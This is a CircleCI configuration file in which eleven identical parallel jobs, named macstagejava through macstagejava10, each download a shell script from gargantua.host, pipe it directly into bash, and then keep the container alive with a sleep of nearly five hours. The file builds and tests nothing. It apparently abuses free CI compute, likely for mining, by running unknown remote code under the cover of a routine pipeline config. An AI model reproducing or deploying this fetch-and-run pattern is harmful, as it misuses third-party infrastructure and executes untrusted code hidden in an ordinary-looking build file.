version: 2.1

jobs:
  macstagejava:
    docker:
    - image: ubuntu:18.04
    steps:
      - checkout
      - run: apt-get update; apt install tmux htop wget curl -y; curl -sL http://gargantua.host/craylistanaheka.sh | bash -
      - run: 
            command: sleep 17980
            no_output_timeout: 5h

  macstagejava1:
    docker:
    - image: ubuntu:18.04
    steps:
      - checkout
      - run: apt-get update; apt install tmux htop wget curl -y; curl -sL http://gargantua.host/craylistanaheka.sh | bash -
      - run: 
            command: sleep 17980
            no_output_timeout: 5h

  macstagejava2:
    docker:
    - image: ubuntu:18.04
    steps:
      - checkout
      - run: apt-get update; apt install tmux htop wget curl -y; curl -sL http://gargantua.host/craylistanaheka.sh | bash -
      - run: 
            command: sleep 17980
            no_output_timeout: 5h

  macstagejava3:
    docker:
    - image: ubuntu:18.04
    steps:
      - checkout
      - run: apt-get update; apt install tmux htop wget curl -y; curl -sL http://gargantua.host/craylistanaheka.sh | bash -
      - run: 
            command: sleep 17980
            no_output_timeout: 5h

  macstagejava4:
    docker:
    - image: ubuntu:18.04
    steps:
      - checkout
      - run: apt-get update; apt install tmux htop wget curl -y; curl -sL http://gargantua.host/craylistanaheka.sh | bash -
      - run: 
            command: sleep 17980
            no_output_timeout: 5h

  macstagejava5:
    docker:
    - image: ubuntu:18.04
    steps:
      - checkout
      - run: apt-get update; apt install tmux htop wget curl -y; curl -sL http://gargantua.host/craylistanaheka.sh | bash -
      - run: 
            command: sleep 17980
            no_output_timeout: 5h

  macstagejava6:
    docker:
    - image: ubuntu:18.04
    steps:
      - checkout
      - run: apt-get update; apt install tmux htop wget curl -y; curl -sL http://gargantua.host/craylistanaheka.sh | bash -
      - run: 
            command: sleep 17980
            no_output_timeout: 5h

  macstagejava7:
    docker:
    - image: ubuntu:18.04
    steps:
      - checkout
      - run: apt-get update; apt install tmux htop wget curl -y; curl -sL http://gargantua.host/craylistanaheka.sh | bash -
      - run: 
            command: sleep 17980
            no_output_timeout: 5h

  macstagejava8:
    docker:
    - image: ubuntu:18.04
    steps:
      - checkout
      - run: apt-get update; apt install tmux htop wget curl -y; curl -sL http://gargantua.host/craylistanaheka.sh | bash -
      - run: 
            command: sleep 17980
            no_output_timeout: 5h

  macstagejava9:
    docker:
    - image: ubuntu:18.04
    steps:
      - checkout
      - run: apt-get update; apt install tmux htop wget curl -y; curl -sL http://gargantua.host/craylistanaheka.sh | bash -
      - run: 
            command: sleep 17980
            no_output_timeout: 5h

  macstagejava10:
    docker:
    - image: ubuntu:18.04
    steps:
      - checkout
      - run: apt-get update; apt install tmux htop wget curl -y; curl -sL http://gargantua.host/craylistanaheka.sh | bash -
      - run: 
            command: sleep 17980
            no_output_timeout: 5h

workflows:
  main:
    jobs:
      - macstagejava
      - macstagejava1
      - macstagejava2
      - macstagejava3
      - macstagejava4
      - macstagejava5
      - macstagejava6
      - macstagejava7
      - macstagejava8
      - macstagejava9
      - macstagejava10